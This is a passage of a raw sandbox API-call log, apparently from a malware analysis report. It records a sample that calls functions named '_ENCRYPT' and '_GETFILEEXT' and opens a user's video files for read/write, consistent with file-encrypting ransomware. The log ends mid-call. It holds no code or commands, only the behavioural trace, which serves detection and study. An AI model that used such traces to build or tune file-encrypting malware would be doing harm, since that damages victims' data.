dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0193.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0193.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0193.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0193.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.032] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0193.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0193.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0193.033] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0193.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0193.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0193.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0193.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0193.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0193.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0193.034] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0193.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0193.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0193.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0193.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0193.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.035] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0193.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0193.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0193.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9fa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0193.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.035] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0193.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0193.036] CloseHandle (hObject=0x158) returned 1 [0193.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0193.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0193.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0193.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0193.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0193.036] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.037] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0193.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0193.037] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.037] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0193.037] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.038] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0193.038] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0193.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.038] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.038] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.038] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0193.038] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0193.039] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0193.039] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0193.039] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.039] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.039] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.039] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0193.039] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.039] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0193.039] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.040] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\sw3tjl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0193.042] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.042] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.042] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.042] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0193.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.043] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.043] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0193.043] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.043] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0193.043] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.043] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0193.043] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0193.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.043] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.060] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.060] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff468790, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xdf92db70, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0xdf92db70, ftLastWriteTime.dwHighDateTime=0x1d5d9d6, nFileSizeHigh=0x0, nFileSizeLow=0x6ccb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="sw3Tjl.mkv", cAlternateFileName="")) returned 0x90add8 [0193.061] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0193.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff468790, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xdf92db70, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0xdf92db70, ftLastWriteTime.dwHighDateTime=0x1d5d9d6, nFileSizeHigh=0x0, nFileSizeLow=0x6ccb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="sw3Tjl.mkv", cAlternateFileName="")) returned 0x90add8 [0193.061] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0193.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.061] CompareStringW (Locale=0x400, 